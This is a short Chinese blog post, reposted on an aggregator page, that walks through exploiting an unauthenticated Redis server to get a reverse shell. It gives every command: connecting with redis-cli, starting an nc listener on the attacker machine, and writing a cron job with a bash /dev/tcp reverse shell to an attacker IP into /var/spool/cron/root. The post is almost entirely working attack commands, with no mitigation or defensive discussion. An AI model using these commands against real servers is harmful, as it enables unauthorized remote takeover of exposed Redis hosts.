码迷,mamicode.com
首页 > 系统相关 > 详细

Redis未授权访问反弹shell

时间:2018-05-03 19:25:07      阅读:1779      评论:0      收藏:0      [点我收藏+]

标签:dir   redis未授权   div   redis   写入   shell   ima   技术分享   成功   

Redis未授权访问反弹shell

目标主机:10.104.11.178

攻击机:kali

攻击步骤:

1.与目标主机连接

root@kali:~# /usr/redis/redis-cli -h 10.104.11.178

 2.kali主机进行监听

nc -l -v  -p 9999

 技术分享图片

3.写入反弹shell语句

set xxx "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/10.104.11.153/9999 0>&1\n\n"
config set dir /var/spool/cron
config set dbfilename root
save

技术分享图片

 4.反弹shell连接成功

技术分享图片

 

Redis未授权访问反弹shell

标签:dir   redis未授权   div   redis   写入   shell   ima   技术分享   成功   

原文地址:https://www.cnblogs.com/someone9/p/8986502.html

(1)
(1)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!